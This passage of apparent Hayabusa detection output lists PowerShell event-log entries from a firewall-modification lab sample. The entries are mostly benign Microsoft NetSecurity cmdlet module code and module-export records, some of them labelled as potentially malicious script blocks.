NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { 
[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.144 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.145 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.179 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.183 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.186 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.227 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.233 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
